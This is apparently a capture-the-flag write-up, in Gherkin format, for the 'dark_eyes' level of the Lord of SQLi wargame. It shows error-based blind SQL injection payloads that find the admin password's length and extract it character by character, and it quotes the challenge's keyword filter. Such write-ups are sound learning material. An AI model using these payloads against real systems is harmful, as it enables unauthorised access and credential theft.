## Version 2.0
## language: en

Feature: dark-eyes-sql-injection-lordofsqli
  Site:
    https://los.rubiya.kr/gate.php
  Category:
    SQL Injection
  User:
    john2104
  Goal:
    Login as admin

  Background:
  Hacker's software:
  | <Software name> | <Version>           |
  | NixOS           | 19.09.2260          |
  | Chromium        | 78.0.3904.87        |

  Machine information:
    Given the challenge URL
    """
    https://los.rubiya.kr/chall/dark_eyes_4e0c557b6751028de2e64d4d0020e02c.php
    """
    When I open the url with Chrome
    Then I see the PHP code that validates the password
    And It shows the query made on the screen
    """
    select id from prob_iron_golem where id='admin' and pw=''
    """

  Scenario: Fail:Sql-injection
    Given the PHP code
    And knowing that answer is correct when It returns:
    """
    DARK_EYES Clear!
    """
    When I try with the same vulnerability as Iron Golem
    """
    length = '1\' or if (length(pw)=' + str(iterate) + \
                 ',1,(select 1 union select pw))-- '
    """
    Then I get "HeHe"
    And I don't solve the challenge

   Scenario: Success:Sqli-error-based-exploitation
    Given that I inspect the code
    Then I realize that they print the MySQL error
    And validates certain characters
    """
    if(preg_match('/col|if|case|when|sleep|benchmark/i',
    $_GET[pw])) exit("HeHe");
    """
    And also to pass the challenge I need the actual admin password
    Then I use an error based blind sqli
    And a range of numbers to get the length of the password
    """
    ...
    length = '1\' or (id=\'admin\' and ( length(pw)=' + str(iterate) + \
                 ' or (select 1 union select pw))) -- '
    ...
    """
    Then with a length defined I searched through that
    And using the same as Iron Golem
    """
    ...
    for j in range(low,top):
    query = '1\' or (id=\'admin\' and ( ord(mid(pw,' + str(num) + \
                    ',1))=' + str(j) + ' or (select 1 union select pw))) -- '
    ...
    """
    When I get a response more than 5 characters long
    Then I know that the character is ok
    When I run the python script [exploit.py]
    Then I get the admin password
    And I solve the challenge
